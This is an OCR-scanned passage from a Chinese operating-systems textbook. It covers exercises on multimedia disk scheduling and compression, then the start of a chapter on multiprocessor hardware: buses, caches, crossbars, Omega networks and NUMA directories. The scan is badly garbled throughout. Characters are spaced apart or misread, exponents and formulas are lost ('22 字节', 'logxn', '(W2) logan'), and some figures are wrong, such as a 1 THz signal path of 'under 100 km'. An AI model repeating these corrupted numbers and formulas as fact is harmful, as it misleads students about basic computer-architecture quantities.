另 一 个 数据 流 以 便 使 它们 合并 ， 为 了 在 3 分 钟 内 

将 它们 合并 ， 需 要 的 加 速 /减速 百分比 是 多 少 ? 

30. 一 台 MPEG-2 视 频 服务 器 对 于 NTSC 视 频 使 用 图 7-26 

的 回环 方法 。 所 有 的 视频 流出 自 一 个 转速 为 10 800 

pm 的 UlvaWide SCSI 磁 盘 ， 磁 盘 的 平均 寻 道 时 间 是 

3ms。 能 够 得 到 支持 的 数据 流 有 多 少 ? 

: 重 做 前 一 个 习题 ， 但 是 现在 假设 scan-EDF 算 法 

将 平均 寻 道 时 间 减 少 了 20%。 现 在 能 够 得 到 支 

持 的 数据 流 有 多 少 ? 

.考虑 到 下 面 一 系列 对 磁盘 的 需求 ， 每 个 需求 由 

一 个 元 组 (截止 时 间 (ms), Em) 代表 。 使 

用 scan_EDF 算 法 后 ， 四 个 即将 到 期 的 需求 聚集 

在 一 起 得 到 服务 。 如 果 服 务 每 个 请 求 的 平均 

时 间 是 6ms， 那 么 有 没有 错过 的 终止 时 间 ? 

(32 300)，(36 500)，(40 210)，(34 310) 

假定 当前 时 间 是 15ms。 

,再 次 重 做 前 一 个 习题 ， 但 是 现在 假设 每 一 帧 在 

四 块 磁盘 上 分 成 条 带 ， 在 每 块 磁盘 上 scan-EDF 

算法 将 平均 寻 道 时 间 减 少 了 20%。 现 在 能 够 得 

到 支持 的 数据 流 有 多 少 ? 
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34. 正文 描述 了 使 用 五 个 数据 请 求 为 一 批 来 调度 在 

图 7-27a 中 所 描述 的 情形 。 如 果 所 有 请 求 需要 
等 量 的 时 间 ， 在 这 个 例子 中 每 个 请 求 可 以 允许 
的 最 大 时 间 是 多 少 ? 

- 供 生 成 计算 机 ”墙纸 ”的 许多 位 图 图 像 使 用 很 少 
的 颜色 并 且 十 分 容易 压缩 。 一 种 简单 的 压缩 方法 
Ж: 选择 一 个 不 在 输入 文件 中 出 现 的 数据 值 ， 并 
且 将 其 用 作 一 个 标志 。 一 个 字 节 一 个 字 节 地 读 取 
文件 ， 寻 找 重复 的 字 节 值 。 将 单个 值 和 最 多 重复 
三 次 的 字 节 直接 复制 到 输出 文件 。 当 4 个 或 更 多 
字 节 的 重复 串 被 发 现时 ， 将 一 个 由 3 个 字 节 组 成 
的 串 写 到 输出 文件 ， 这 3 个 字 节 的 串 包括 标志 字 
节 、 指 示 从 4 到 255 计 数 的 字 节 和 在 输入 文件 中 发 
现 的 实际 的 值 。 使 用 该 算法 编写 一 个 压缩 程序 ， 
以 及 一 个 能 够 恢复 原始 文件 的 解压 缩 程序 。 额 外 
要 求 : 如 何 处 理 在 数据 中 包含 标志 字 节 的 文件 ? 

- 计算 机 动画 是 通过 显示 具有 微小 差异 的 图 像 序 
列 实现 的 。 编 写 一 个 程序 ， 计 算 两 幅 具 有 相同 
尺寸 的 未 压缩 位 图 图 像 之 间 的 字 节 和 字 节 的 
差 。 当 然 ， 输 出 文件 应 该 与 输入 文件 具有 相同 
的 大 小 。 使 用 这 一 差 值 文件 作为 前 一 个 习题 中 
的 压缩 程序 的 输入 ， 并 且 将 这 一 方法 的 效率 和 
压缩 单个 图 像 的 情况 进行 比较 。 

37. 实现 教材 中 的 基本 RMS 和 和 EDF 算法。 程序 的 主要 
输入 是 一 个 有 若干 行 的 文件 ， 每 行 代表 一 个 进程 
的 CPU 请 求 ， 并 且 有 如 下 的 参数 ， 周 期 ( 秒 )、 
计算 时 间 ( 秒 )、 开 始 时 间 ( 秒 )、 结 束 时 间 ( 秒 )。 
在 以 下 方面 对 比 两 个 算法 : a) 由 于 CPU 的 不 可 调 
度 性 导致 平均 被 阻塞 的 CPU 请 求 数 ，b) 平均 CPU 
使 用 率 ，c) 每 个 CPU 请 求 的 平均 等 待 时 间 ，d) 错 
过 截止 时 间 的 请 求 平均 数量 。 

.实现 存储 多 媒体 文件 的 常量 时 间 长 度 和 常量 数 
据 长 度 的 技术 .程序 的 主要 输入 是 一 系列 文件 ， 
每 个 文件 包含 一 个 MPEG-2 压 缩 多 媒体 文件 
(如 电影 ) 的 每 帧 元 数据 。 元 数据 包括 帧 类 型 
(UP/B)、 杆 长 、 相 关联 的 音频 帧 等 。 对 于 不 
同文 件 块 大 小 ， 就 需要 的 总 存储 空间 大 小 、 浪 
费 的 磁盘 存储 空间 和 平均 RAM 需 求 三 个 方面 
比较 两 种 技术 。 

39. 在 上 面 的 程序 上 添加 一 个 “读者 ”程序 ， 它 随 
机 地 从 上 面 的 输入 列表 中 选择 文件 ， 使 用 VCR 
功能 的 视频 点 播 或 准 视频 点 播 。 实 现 scan-EDF 
算法 以 便 能 够 给 出 磁盘 读 请 求 。 就 每 个 文件 的 
平均 寻找 磁盘 次 数 比较 常量 时 间 长 度 和 常量 数 
据 长 度 这 两 个 方法 。 
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第 8 章 多 处 理 机 系统 


从 计算 机 诞生 之 日 起 ， 人 们 对 更 强 计算 能 力 的 无 休止 的 追求 就 一 直 驱 使 着 计算 机 工业 的 发 展 。 
ENIAC 可 以 完成 每 秒 300 次 的 运算 ， 它 一 下 子 就 比 以 往 任何 计算 器 都 快 1000 多 倍 ， 但 是 人 们 并 不 满足 。 
我 们 现在 有 了 比 ENIAC 快 数 百 万 倍 的 机 器 ， 但 是 还 有 对 更 强大 机 器 的 需求 。 天 文学 家 们 正在 了 解 宇宙 ， 
生物 学 家 正在 试图 理解 人 类 基因 的 含义 ， 航空 工程 师 们 致力 于 建造 更 安全 和 速度 更 快 的 飞机 ， 而 所 有 这 
一 切 都 需要 更 多 的 CPU 周期 。 然 而 ， 即 使 有 更 多 运算 能 力 ， 仍 然 不 能 满足 需求 。 

过 去 的 解决 方案 是 使 时 钟 走 得 更 快 。 但 是 ， 现 在 开始 遇 到 对 时 钟 速度 的 限制 了 。 按照 爱 因 斯 坦 的 相 
对 论 ， 电 子 信号 的 速度 不 可 能 超过 光速 ， 这 个 速度 在 真空 中 大 约 是 30cm/ns， 而 在 铜 线 或 光纤 中 约 是 
20cm/ns。 这 在 计算 机 中 意味 着 10GHz 的 时 钟 ， 信 号 的 传送 距离 总 共 不 会 超过 2cm。 对 于 100GHz 的 计算 
机 ， 整 个 传送 路 径 长 度 最 多 为 2mm。 而 在 一 台 1THz (1000GHz) 的 计算 机 中 ， 传送 距离 就 不 足 100km 了 ， 
这 在 一 个 时 钟 周期 内 正好 让 信号 从 一 端 到 另 一 端 并 返回 。 

让 计算 机 变 得 如 此 之 小 是 可 能 的 ， 但 是 这 会 遇 到 另 一 个 基本 问题 : 散热。 计算 机 运行 得 越 快 ， 产 生 的 
热量 就 越 多 ， 而 计算 机 越 小 就 越 难 散热 。 在 高 端 Pentium 系 统 中 ， CPU 的 散热 器 已 经 比 CPU 自 身 还 要 大 了 。 
总 而 言 之 ， 从 1MHz 到 1GHz 需 要 的 是 更 好 的 芯片 制造 工艺 ， 而 从 1GHz 到 1THz 则 需要 完全 不 同 的 方法 。 

获得 更 高 速度 的 一 种 处 理 方式 是 大 规模 使 用 并 行 计算 机 。 这 些 机 器 有 许多 CPU， 每 一 个 都 以 “ 通 
常 ” 的 速度 (在 一 个 给 定年 份 中 的 速度 ) 运行 ， 但 是 总 体 上 会 有 比 单个 CPU 强 大 得 多 的 计算 能 力 。 具 有 
1000 个 CPU 的 系统 已 经 商业 化 了 。 在 未 来 十 年 中 ， 可 能 会 建造 出 具有 100 万 个 CPU 的 系统 。 当 然 为 了 获 
得 更 高 的 速度 ， 还 有 其 他 流 在 的 处 理 方式 ， 如 生物 计算 机 ， 但 在 本 章 中 ， 我 们 将 专注 于 有 多 个 普通 CPU 
的 系统 。 

在 高 强度 的 数据 处 理 中 经 常 采用 高 度 并 行 计算 机 。 如 天 气 预测 、 围绕 机 器 的 气流 建 模 、 世 界 经 济 模拟 
或 理解 大 脑 中 药物 - 受 体 的 相互 作用 等 问题 都 是 计算 密集 型 的 。 解决 这 些 问题 需要 多 个 CPU 同 时 长 时 间 运 
行 。 在 本 章 中 讨论 的 多 处 理 机 系统 被 广泛 地 用 于 解决 这 些 问题 以 及 在 其 他 科学 、 工程 领域 中 的 类 似 问题 。 

另 一 个 相关 的 进展 是 因特网 不 可 思议 地 快速 增长 。 因特网 最 初 被 设计 为 一 个 军用 的 容错 控制 系统 的 
原型 ， 然 后 在 从 事 学 术 研究 的 计算 机 科学 家 中 流行 开 来 ， 并 且 在 过 去 它 已 经 获得 了 许多 新 用 途 。 其 中 一 
种 用 途 是 ， 把 全 世界 的 数 千 台 计算 机 连接 起 来 ， 共 同 处 理 大 型 的 科学 问题 。 在 某 种 意义 上 ， 一 个 包含 有 
分 布 在 全 世界 的 1000 台 计算 机 的 系统 与 在 一 个 房间 中 有 1000 人 台 计 算 机 的 系统 之 间 没 有 差别 ， 尽管 这 两 个 
系统 在 延 时 和 其 他 技术 特征 方面 会 有 所 不 同 。 在 本 章 中 我 们 也 将 讨论 这 些 系统 。 

假如 有 足够 多 的 资金 和 足够 大 的 房间 ， 把 一 百 万 台 无 关 的 计算 机 放 到 一 个 房间 中 很 容易 做 到 。 把 一 
百 万 台 无 关 的 计算 机 放 到 全 世界 就 更 容易 了 ， 因 为 不 存在 第 二 个 问题 了 。 当 要 在 一 个 房间 中 使 这 些 计算 
机 相互 通信 ， 以 便 共同 处 理 一 个 问题 时 ， 问 题 就 出 现 了 。 结 果 ， 人 们 在 互 连 技术 方面 做 了 大 量 工作 ， 而 
且 不 同 的 互 连 技术 已 经 导致 了 不 同性 质 的 系统 以 及 不 同 的 软件 组 织 。 

在 电子 (或 光学 ) 部 件 之 间 的 所 有 通信 ， 归根 结 底 是 在 它们 之 间 发 送 消息 一 一 具有 良好 定义 的 位 串 
(bit string)。 其 差别 在 于 所 涉及 的 时 间 范围 、 距 离 范围 和 逻辑 组 织 。 一 个 极端 的 例子 是 共享 存储 器 多 处 
理 机 ， 系 统 中 有 从 2 个 到 1000 个 的 CPU 通过 一 个 共享 存储 器 通信 。 在 这 个 模型 中 ， 每 个 CPU 可 同样 访问 
整个 物理 存储 器 ， 可 使 用 指令 LOAD 和 STORE 读 写 单个 的 字 。 访问 一 个 存储 器 字 通 常 需要 2~10ns。 尽 管 
这 个 模型 ， 如 图 8-1a 所 示 ， 看 来 很 简单 ， 但 是 实际 上 要 实现 它 并 不 那么 简单 ， 而 且 通常 涉及 底层 大 量 的 
消息 传递 ， 这 一 点 我 们 会 简要 地 加 以 说 明 。 不 过 ， 该 消息 传递 对 于 程序 员 来 说 是 不 可 见 的 。 

其 次 是 图 8-1b 中 的 系统 ， 许多 CPU 一 存储 器 通过 某 种 高 速 互连网 络 连接 在 一 起 。 这 种 系统 称 为 消息 
传递 型 多 计算 机 。 每 个 存储 器 局 部 对 应 一 个 CPU， 且 只 能 被 该 CPU 访问 。 这 些 CPU 通过 互连网 络 发 送 多 
字 消 息 通信 。 存 在 良好 的 连接 时 ， 一 条 短 消 息 可 在 10~50hs 之 内 发 出 ， 但 是 这 仍然 比 图 8-1a 中 系统 的 存 
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储 器 访问 时 间 长 。 在 这 种 设计 中 没有 全 局 共享 的 存储 器 。 多 计算 机 (消息 传递 系统 ) 比 (共享 存储 器 ) 
多 处 理 机 系统 容易 构建 ， 但 是 编程 比较 困难 。 可 见 ， 每 种 类 型 各 有 其 优点 。 


图 8-1 а) 共享 存储 器 多 处 理 机 ，b) 消息 传递 多 计算 机 ，c) 广 域 分 布 式 系统 


第 三 种 模型 参见 图 8-1c， 所 有 的 计算 机 系统 都 通过 一 个 广域网 连接 起 来 ， 如 因特网 ， 构 成 了 一 个 
分 布 式 系统 (distributed system)。 每 台 计算 机 有 自己 的 存储 器 ， 当 然 ， 通 过 消息 传递 进行 系统 通信 。 
图 8-1b 和 图 8-1c 之 间 真正 惟一 的 差别 是 , 后 者 使 用 了 完整 的 计算 机 而 且 消息 传递 时 间 通常 需要 10~100ms。 
如 此 长 的 延迟 造成 使 用 这 类 松散 友 合 系统 的 方式 和 图 8-lb 中 的 紧 害 历 合 系统 不 同 。 三 种 类 型 的 系统 在 通 
信 延 迟 上 各 不 相同 ， 分 别 有 三 个 数量 级 的 差别 。 类 似 于 一 天 和 三 年 的 差别 。 

本 章 有 四 个 主要 部 分 ， 分 别 对 应 于 图 8-1 中 的 三 个 模型 再 加 上 虚拟 化 技术 (一 种 通过 软件 创造 出 更 
多 虚拟 CPU 的 方法 )。 在 每 一 部 分 中 ， 我 们 先 简要 地 介绍 相关 的 硬件 。 然 后 ， 讨 论 软件 ， 特 别 是 与 这 种 
系统 类 型 有 关 的 操作 系统 问题 。 我 们 会 发 现 ， 每 种 情况 都 面临 着 不 同 的 问题 并 且 需 要 不 同 的 解决 方法 。 


8.1 多 处 理 机 

共享 存储 器 多 处 理 机 (或 以 后 简称 为 多 处 理 机 ，multiprocessor) 是 这 样 一 种 计算 机 系统 ， 其 两 个 
或 更 多 的 CPU 全 部 共享 访问 一 个 公用 的 RAM。 运 行 在 任何 一 个 CPU 上 的 程序 都 看 到 一 个 普通 (通常 是 分 
页 ) 的 虚拟 地 址 空间 。 这 个 系统 惟一 特别 的 性 质 是 ，CPU 可 对 存储 器 字 写 人 某 个 值 ， 然 后 读 回 该 字 ， 并 
得 到 一 个 不 同 的 值 (因为 另 一 个 CPU 改写 了 它 )。 在 进行 恰当 组 织 时 ， 这 种 性 质 构成 了 处 理 器 间 通 信 的 
Жай: 一 个 CPU 向 存储 器 写 和 人 某 些 数据 而 另 一 个 读 取 这 些 数据 。 

至 于 最 重要 的 部 分 ， 多 处 理 机 操作 系统 只 是 通常 的 操作 系统 。 它 们 处 理 系统 调用 ， 进 行 存储 器 管理 ， 
提供 文件 系统 并 管理 1/O 设 备 。 不 过 ， 在 某 些 领域 里 它们 还 是 有 一 些 独特 的 性 质 。 这 包括 进程 同步 、 资 
源 管理 以 及 调度 。 下 面 首先 概要 地 介绍 多 处 理 机 的 硬件 ， 然 后 进入 有 关 操作 系统 的 问题 。 


8.1.1 多 处 理 机 硬件 

所 有 的 多 处 理 机 都 具有 每 个 CPU 可 访问 全 部 存储 器 的 性 质 ， 而 有 些 多 处 理 机 仍 有 一 些 其 他 的 特性 ， 即 
读 出 每 个 存储 器 字 的 速度 是 一 样 快 的 。 这 些 机 器 称 为 UMA (Uniform Memory Access， 统 一 存储 器 访问 ) 
多 处 理 机 。 相 反 ，NUMA (Nonuniform Memory Access， 非 一 致 育 储 器 访问 ) 多 处 理 机 就 没有 这 种 特性 。 
至 于 为 何 有 这 种 差别 ， 稍 后 会 加 以 说 明 。 我 们 将 首先 考察 UMA 多 处 理 机 ， 然 后 讨论 NUMA 多 处 理 机 。 

1. 基于 总 线 的 UMA 多 处 理 机 体系 结构 

最 简单 的 多 处 理 机 是 基于 单 总 线 的 ， 参 见 图 8-2a。 两 个 或 更 多 的 CPU 以 及 一 个 或 多 个 存储 器 模块 都 
使 用 同一 个 总 线 进行 通信 。 当 一 个 CPU 需要 读 一 个 存储 器 字 (memory word) 时 ， 它 首先 检查 总 线 忙 否 。 
如 果 总 线 空 亲 ， 该 CPU 把 所 需 字 的 地 址 放 到 总 线 上 ， 发 出 若干 控制 信号 ， 然 后 等 待 存储 器 把 所 需 的 字 放 
到 总 线 上 。 

当 某 个 CPU 需要 读 写 存储 器 时 ， 如 果 总 线 忙 ，CPU 只 是 等 待 ， 直 到 总 线 空闲 。 这 种 设计 存在 问题 。 
在 只 有 两 三 个 CPU 时 ， 对 总 线 的 争夺 还 可 以 管理 ， 若 有 32 个 或 64 个 CPU 时 ， 就 不 可 忍受 了 。 这 种 系统 完 
全 受到 总 线 带宽 的 限制 ， 多 数 CPU 在 大 部 分 时 间 里 是 空闲 的 。 

这 一 问题 的 解决 方案 是 为 每 个 CPU 添 加 一 个 高 速 缓存 (cache) ， 如 图 8-2b 所 示 。 这 个 高 速 缓存 可 以 
位 于 CPU 芯片 的 内 部 、CPU 附 近 、 在 处 理 器 板 上 或 所 有 这 三 种 方式 的 组 合 。 由 于 许多 读 操作 可 以 从 本 地 
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图 8-2 三 类 基于 总 线 的 多 处 理 机 : а) 没有 高 速 缓存 ，b) 有 高 速 缓存 ，c) 有 高 速 缓存 与 私有 存储 器 
高 速 缓存 上 得 到 满足 ， 总 线 流量 就 大 大 减少 了 ， 这 样 系统 就 能 够 支持 更 多 的 CPU 。 一 般 而 言 ， 高 速 缓存 
不 以 单个 字 为 基础 ， 而 是 以 32 字 节 或 64 字 节 块 为 基础 。 当 引用 一 个 字 时 ， 它 所 在 的 整个 数据 块 (叫做 一 
个 cache 行 ) 被 取 到 使 用 它 的 CPU 的 高 速 缓存 当中 。 

每 一 个 高 速 缓 存 块 或 者 被 标记 为 只 读 (在 这 种 情况 下 ， 它 可 以 同时 存在 于 多 个 高 速 缓存 中 ) ， 或 者 
标记 为 读 写 (在 这 种 情况 下 ， 它 不 能 在 其 他 高 速 缓存 中 存在 ) 。 如 果 CPU 试 图 在 一 个 或 多 个 远程 高 速 组 
存 中 写 人 一 个 字 , 总 线 硬件 检测 到 写 ， 并 把 一 个 信号 放 到 有 线 上 通知 所 有 其 他 的 高 速 缓存 。 如 果 其 他 高 
速 缓存 有 个 “干净 ”的 副本 ， 也 就 是 同 存储 器 内 容 完全 一 样 的 副本 ， 那么 它们 可 以 丢弃 该 副本 并 让 写 者 
在 修改 之 前 从 存储 器 取出 高 速 缓 存 块 。 如 果菜 些 其 他 高 速 缓存 有 “ 脏 ”( 被 修改 过 ) 副本 ， 它 必须 在 处 
理 写 之 前 把 数据 写 回 存储 器 或 者 把 它 通过 总 线 直接 传送 到 写 者 上 。 高 速 缓存 这 一 套 规则 被 称 为 高 速 缓存 
一 致 性 协议 ， 它 是 诸多 协议 之 一 。 

还 有 另 一 种 可 能 性 就 是 图 8-2c 中 的 设计 ， 在 这 种 设计 中 每 个 CPU 不 止 有 一 个 高 速 缓存 ， 还 有 一 个 本 地 
的 私有 存储 器 ， 它 通过 一 条 专门 的 (私有) 总 线 访问 。 为 了 优化 使 用 这 一 配置 ， 编译 器 应 该 把 所 有 程序 的 
代码 、 字 符 串 、 常 量 以 及 其 他 只 读数 据 、 栈 和 局 部 变量 放 进 私有 存储 器 中 。 而 共享 存储 器 只 用 于 可 写 的 共 
享 变量 。 在 多 数 情况 下 ， 这 种 仔细 的 放置 会 极 大 地 减少 总 线 流量 ， 但 是 这 样 做 需要 编译 器 的 积极 配合 。 

2. 使 用 交叉 开关 的 UMA 多 处 理 机 

即使 有 最 好 的 高 速 缓存 ， 单个 总 线 的 使 用 还 是 把 UMA 多 处 理 机 的 数量 限制 在 16 至 32 个 CPU。 要 超 
过 这 个 数量 ， 需 要 不 同类 型 的 互连网 络 。 连接 n 个 CPU 到 k 个 存储 器 的 最 简单 的 电路 是 交叉 开关 ， 参 见 图 
8-3。 交 又 开关 在 电话 交换 系统 中 已 经 采用 了 几 十 年 ， 用 于 把 一 组 进 线 以 任意 方式 连接 到 一 组 出 线 上 。 
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图 8-3 a) 8 x 8 交叉 开关 ，b) 打开 的 交叉 点 ，c) 闭合 的 交叉 点 
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水 平 线 GER) 和 垂直 线 (出 线 ) 的 每 个 相交 位 置 上 是 一 个 交叉 点 (erosspoint) 。 交 叉 点 是 一 个 以 
电子 方式 开关 的 小 开关 ， 具 体 取决 于 水 平 线 和 垂直 线 是 否 需要 连接 。 在 图 8-3a 中 我 们 看 到 有 三 个 交叉 点 
同时 闭合 ， 允 许 (CPU， 存 储 器 ) 对 (010, 000), (101, 101) 和 (110, 010) 同时 连接 。 其 他 的 连接 
也 是 可 能 的 。 事 实 上 ， 组 合 的 数量 等 于 象棋 盘 上 8 个 棋子 安全 放置 方式 的 数量 (8 皇后 问题 )。 

交叉 开关 最 好 的 一 个 特性 是 它 是 一 个 非 租 宣 网 络 ， 即 不 会 因 有 些 交叉 点 或 连 线 已 经 被 占据 了 而 拒绝 
连接 (假设 存储 器 模块 自身 是 可 用 的 )。 而 且 并 不 需要 预先 的 规划 。 即 使 已 经 设置 了 7 个 任意 的 连接 ， 还 
有 可 能 把 剩余 的 CPU 连接 到 剩余 的 存储 器 上 。 

当然 ， 当 两 个 CPU 同时 试图 访问 同一 个 模块 的 时 候 ， 对 内 存 的 争夺 还 是 可 能 的 。 不 过 ， 通 过 将 内 存 
分 为 "个 单元 ， 与 图 8-2 的 模型 相 比 ， 这 样 的 争夺 概率 可 以 降 至 ln。 

交叉 开关 最 差 的 一 个 特性 是 ， 交 叉 点 的 数量 以 下 方式 增长 。 车 有 1000 个 CPU 和 1000 个 存储 器 我 们 就 
需要 一 百 万 个 交叉 点 。 这 样 大 数量 的 交叉 开关 是 不 可 行 的 。 不 过 ， 无 论 如 何 对 于 中 等 规模 的 系统 而 言 ， 
交叉 开关 的 设计 是 可 用 的 。 

3. 使 用 多 级 交换 的 UMA 多 处 理 机 

有 一 种 完全 不 同 的 、 基 于 简单 2 x 2 开关 的 多 处 理 机 设计 ， 参 见 图 8-4a。 这 个 开关 有 两 个 输入 和 两 个 
输出 。 到 达 任 意 一 个 输入 线 的 消息 可 以 被 交换 至 
任意 一 个 输出 线 上 。 就 我 们 的 目标 而 言 ， 消 息 可 本 
由 四 个 部 分 组 成 ， 参 见 图 8-4b。Module (Hik) 
域 指明 使 用 哪个 存储 器 。Address (地 址 ) 域 指 
定 在 模块 中 的 地 址 。 Opcode (操作 码 ) 给 定 了 图 8-4 а) 一 个 带 有 A 和 B 两 个 输入 线 以 及 X 和 Y 
操作 ， 如 READ 或 WRITE。 最 后 ， 在 可 选 的 两 个 输出 线 的 2 x 2 的 开关 ，b) 消息 格式 
Value ( 值 ) 域 中 可 包含 一 个 操作 数 ， 比 如 一 个 
要 被 WRITE 写 人 的 32 位 字 。 该 开关 检查 Module 域 并 利用 它 确定 消息 是 应 该 送 给 X 还 是 发 送 给 Y。 

这 个 2x 2 开关 可 有 多 种 使 用 方式 ， 用 以 构建 大 型 的 多 级 交换 网 络 (Adams 等 人 ，1987， Bhuyan 等 
人 ，1989，Kuman 和 Reddy，1987)。 有 一 种 是 简单 经 济 的 Omega 网 络 ， 见 图 8-5。 这 里 采用 了 12 个 开关 ， 
把 8 个 CPU 连接 到 8 个 存储 器 上 。 推 而 广 之 ， 对 于 mn 个 CPU 和 mn 个 存储 器 ， 我 们 将 需要 logxn 级 ， 每 级 2 个 
开关 ， 总 数 为 (W2) logan 个 开关 ， 比 个 交叉 点 要 好 得 多 ， 特 别 是 当 n 值 很 大 时 。 

Omega 网 络 的 接线 模式 常 被 称 作 全 混 洗 (perfect shuffle) ， 因 为 每 一 级 信号 的 混合 就 像 把 一 副 牌 分 
成 两 半 ， 然 后 再 把 牌 一 张 张 混 合 起 来 。 接 着 看 看 Omega 网 络 是 如 何 工作 的 ， 假 设 CPU 011 打 算 从 存储 器 
模块 110 读 取 一 个 字 。CPU 发 送 READ 消 息 给 开关 1D， 它 在 Module 域 包含 110。1D 开 关 取 110 的 首位 (Ж 
左 位 ) 并 用 它 进行 路 由 处 理 。0 路 由 到 上 端 输出 ， 而 1 的 路 由 到 下 端 ， 由 于 该 位 为 1， 所 以 消息 通过 低 端 
输出 被 路 由 到 2D。 

所 有 的 第 二 级 开关 ， 包 括 2D， 取 用 第 二 个 比特 位 进行 路 由 。 这 一 位 还 是 1， 所 以 消息 通过 低 端 输出 
转发 到 3D。 在 这 里 对 第 三 位 进行 测试 ， 结 果 发 现 是 0。 于 是 ， 消 息 送 往 上 端 输出 ， 并 达到 所 期 望 的 存储 
器 110。 该 消息 的 路 径 在 图 8-5 中 由 字母 a 标 出 。 
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图 8-5 Omega 交换 网 络 
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在 消息 通过 交换 网 络 之 后 ， 模 块 号 的 左 端的 位 就 不 再 需要 了 。 它 们 可 以 有 很 好 的 用 途 ， 可 以 用 来 记 
录入 线 编号 ， 这样， 应 答 消 息 可 以 找到 返回 路 径 。 对 于 路 径 a， 入 线 编号 分 别 是 0 (向 上 输入 到 1D)、1 ( 
低 输入 到 2D) 和 1 ( 低 输入 到 3D)。 使 用 011 作 为 应 答 路 由 ， 只 要 从 右 向 左 读 出 每 位 即 可 。 

在 上 述 这 一 切 进 行 的 同时 ，CPU 001 需 要 往 存储 器 001 里 写 入 一 个 字 。 这 里 发 生 的 情况 与 上 面 的 类 
似 ， 消 息 分 别 通过 上 、 上 、 下 端 输出 路 由 ， 由 字母 b 标 出 。 当 消息 到 达 时 ， 从 Module 域 读 出 001， 代 表 了 
对 应 的 路 径 。 由 于 这 两 个 请 求 不 使 用 任何 相同 的 开关 、 连 线 或 存储 器 模块 ， 所 以 它们 可 以 并 行 工作 。 

现在 考虑 如 果 CPU 000 同 时 也 请 求 访问 存储 器 模块 000 会 发 生 什么 情况 。 这 个 请 求 会 与 CPU 001 的 请 
求 在 开关 3A 处 发 生 冲 突 。 它 们 中 的 一 个 就 必须 等 待 。 和 交叉 开关 不 同 ，Omega 网 络 是 一 种 阻塞 网 络 ， 并 
不 是 每 组 请 求 都 可 被 同时 处 理 。 冲 突 可 在 一 条 连 线 或 一 个 开关 中 发 生 ， 也 可 在 对 存储 器 的 请 求 和 来 自 存 
储 器 的 应 答 中 产生 。 

显然 ， 很 有 必要 在 多 个 模块 间 均 匀 地 分 散 对 存储 器 的 引用 。 一 种 常用 的 技术 是 把 低位 作为 模块 号 。 
例如 ， 考 虑 一 台 经 常 访 问 32 位 字 的 计算 机 中 面向 字 节 的 地 址 空间 ， 低 位 通常 是 00， 但 接 下 来 的 3 位 会 均 
匀 地 分 布 。 将 这 3 位 作为 模块 号 ， 连 续 的 字 会 放 在 连续 的 模块 中 。 而 连续 字 被 放 在 不 同 模块 里 的 存储 器 
系统 被 称 作 交 叉 (interleaved) 存储 器 系统 。 交 叉 存储 器 将 并 行 运行 的 效率 最 大 化 了 ， 这 是 因为 多 数 对 
存储 器 的 引用 是 连续 编 址 的 。 设 计 非 阻塞 的 交换 网 络 也 是 有 可 能 的 ， 在 这 种 网 络 中 ， 提 供 了 多 条 从 每 个 
CPU 到 每 个 存储 器 的 路 径 ， 从 而 可 以 更 好 地 分 散 流量 。 

4.NUMA 多 处 理 机 

单 总 线 UMA 多 处 理 机 通常 不 超过 几 十 个 CPU， 而 交叉 开关 或 交换 网 络 多 处 理 机 需要 许多 (昂贵 ) 
的 硬件 ， 所 以 规模 也 不 是 那么 大 。 要 想 超过 100 个 CPU 还 必须 做 些 让 步 。 通 常 ， 一 种 让 步 就 是 所 有 的 存 
储 器 模块 都 具有 相同 的 访问 时 间 。 这 种 让 步 导 致 了 前 面 所 说 的 NUMA 多 处 理 机 的 出 现 。 像 UMA 一 样 ， 
这 种 机 器 为 所 有 的 CPU 提供 了 一 个 统一 的 地 址 空间 ， 但 与 UMA 机 器 不 同 的 是 ， 访 问 本 地 存储 器 模块 快 
于 访问 远程 存储 器 模块 。 ， 在 NUMA 机 器 上 运行 的 所 有 UMA 程 序 无 须 做 任何 改变 ， 但 在 相同 的 时 
钟 速率 下 其 性 能 不 如 UMA 机 器 上 的 性 能 。 

所 有 NUMA 机 器 都 具有 以 下 三 种 关键 特性 ， 它 们 使 得 NUMA 机 器 与 其 他 多 处 理 机 相 区 别 ; 

1) 具有 对 所 有 CPU 都 可 见 的 单个 地 址 空间 。 

2) 通过 LOAD 和 STORE 指令 访问 远程 存储 器 。 

3) 访问 远程 存储 器 慢 于 访问 本 地 存储 器 。 

在 对 远程 存储 器 的 访问 时 间 不 被 隐藏 时 〈 因 为 没有 高 速 缓存 ) ， 系 统 被 称 为 NC- МОМА (No Cache 
NUMA ， 无 高 速 线 存 NUMA) 。 在 有 一 致 性 高 速 缓存 时 ， 系 统 被 称 为 CC- МОМА (Cache-Coherent 
NUMA， 高 速 缓存 一 致 NUMA)。 

目前 构造 大 型 CC-NUMA 多 处 理 机 最 常见 的 方法 是 基于 目录 的 多 处 理 机 (directory-based 
multiprocessor) 。 其 基本 思想 是 ， 维 护 一 个 数据 库 来 记录 高 速 缓存 行 的 位 置 及 其 状态 。 当 一 个 高 速 缓存 
行 被 引用 时 ， 就 查询 数据 库 找 出 高 速 缓存 行 的 位 置 以 及 它 是 “干净 ”的 还 是 “ 脏 ”( 被 修改 过 ) 的 。 由 
于 每 条 访问 存储 器 的 指令 都 必须 查询 这 个 数据 库 ， 所 以 它 必须 配 有 极 高 速 的 专用 硬件 ， 从 而 可 以 在 一 个 
总 线 周 期 的 几 分 之 一 内 作出 响应 。 

要 使 基于 目录 的 多 处 理 机 的 想法 更 具体 ， 让 我 们 考虑 一 个 简单 的 (假想 ) 例子 ， 一 个 256 个 节点 的 
系统 ， 每 个 节点 包括 一 个 CPU 和 通过 局 部 总 线 连 接 到 CPU 上 的 16MB 的 RAM。 整 个 存储 器 有 22 字 节 ， 被 
划分 成 2" 个 64 字 节 大 小 的 高 速 缓存 行 。 存 储 器 被 静态 地 在 节点 间 分 配 ， 节 点 0 是 0~-16M， 节 点 1 是 
16~32M， 以 此 类 推 。 节 点 通过 互连网 络 连接 ， 参 见 图 8-6a。 每 个 节点 还 有 用 于 构成 其 2% 字 节 存 储 器 的 
2 "个 64 字 节 高 速 缓存 行 的 目录 项 。 此 刻 ， 我 们 假定 一 行 最 多 被 一 个 高 速 缓存 使 用 。 

为 了 了 解 目录 是 如 何 工作 的 ,让 我 们 跟踪 引用 了 一 个 高 速 缓存 行 的 发 自 CPU 20 的 LOAD 指 令 。 首 先 ， 
发 出 该 指令 的 CPU 把 它 交 给 自己 的 MMU， 被 翻译 成 物理 地 址 ， 比 如 说 ，0x24000108。MMU 将 这 个 地 址 
拆 分 为 三 个 部 分 ， 如 图 8-6b 所 示 。 这 三 个 部 分 按 十 进 制 是 节点 36、 第 4 行 和 偏 移 量 8。MMU 和 看 到 引用 的 
